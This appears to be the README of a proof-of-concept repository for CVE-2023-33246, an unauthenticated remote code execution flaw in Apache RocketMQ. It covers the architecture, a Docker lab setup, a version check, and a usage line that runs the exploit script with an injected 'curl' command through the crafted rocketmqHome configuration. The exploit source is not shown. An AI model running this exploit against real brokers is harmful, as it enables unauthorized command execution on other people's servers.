来源

关联漏洞

介绍

# CVE-2023-33246: Apache RocketMQ Remote Code Execution



## OVERVIEW
Apache RocketMQ is one of the most popular and widely used distributed messaging and streaming platforms.
A command execution vulnerability has been recently reported in Apache RocketMQ affecting version 5.1.0 and below. A remote unauthenticated user can exploit this vulnerability by using the update configuration function to execute commands with same access level as that of RocketMQ user process.
## Essential Components
### Nameserver:

1. The nameserver in RocketMQ acts as a registry or metadata store for the entire messaging infrastructure.

2. It maintains information about topics, queues, and the brokers responsible for handling messages.

3. Clients (producers and consumers) use the nameserver to discover the brokers that they need to communicate with for publishing or consuming messages.

4. The nameserver is responsible for dynamic routing, load balancing, and failover within the RocketMQ cluster.

5. It listens on a specific port (usually port 9876 by default) for incoming requests from clients and brokers.

### Broker:
1. Brokers are the workhorses of the RocketMQ system, responsible for storing and managing messages.

2. Each broker manages one or more topics, which are logical channels for message communication.

3. Producers publish messages to specific topics, and consumers subscribe to topics to receive messages.

4. Brokers handle message storage, replication, and delivery to consumers based on subscriptions and message consumption patterns.

5. They maintain message queues for each topic-partition, ensuring efficient message processing and delivery.

6. Brokers communicate with nameservers to register themselves, update metadata, and participate in the cluster's routing and load balancing mechanisms.


## Environment Setup:-
Setup local RocketMQ environment via Docker
```
docker pull apache/rocketmq:4.9.4
### Start nameserver
docker run -d --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.4 sh mqnamesrv
### Start Broker
docker run -d --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -p 10909:10909 -p 10911:10911 -p 10912:10912 apache/rocketmq:4.9.4 sh mqbroker -c /home/rocketmq/rocketmq-4.9.4/conf/broker.conf
```
## usage examples
### 1. Version Check
### Using default config, Broker cluster gets initiated on tcp port 9876 to start receiving messages from a client. For example, below is a sample communication b/w a client and broker to fetch RocketMQ version
```
python3 check.py --ip 127.0.0.1 --port 9876
```
![rock](https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT/assets/126046383/000e2656-d7e2-44d9-80ab-3f44c0a28815)

**PCAP**
![rock](https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT/assets/126046383/1ac50ad6-a8f9-4cd7-b002-3483c136e960)

### 2. Exploit analysis
The UpdateBrokerConfig() function is triggered when a request with code '25', which is associated with RequestCode, is received
```
python3 CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py 127.0.0.1 10911 curl 127.0.0.1/exp
```
![Screenshot 2024-03-28 164712](https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT/assets/126046383/b90f0663-fae8-4cfd-96b1-282646e44655)

PCAP

![rock](https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT/assets/126046383/aac8af77-1080-4ea4-b6b8-934c8f39c5a6)

We utilize the "rocketmqHome" server configuration found in the broker.conf file. This configuration sets the value of the environmental variable ROCKETMQ_HOME within the RocketMQ user process. Through careful crafting of this value, we can execute commands of our choosing.

![rock](https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT/assets/126046383/a754d26d-7051-4357-9ed5-23976f486dda)





this is how this vulnerability works..

文件快照

 [4.0K]  /data/pocs/22bddbc7817e22d721f7d73a0e7a245657a021b2
├── [ 16K]  check.py
├── [1.3K]  CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py
└── [3.7K]  README.md

0 directories, 3 files

备注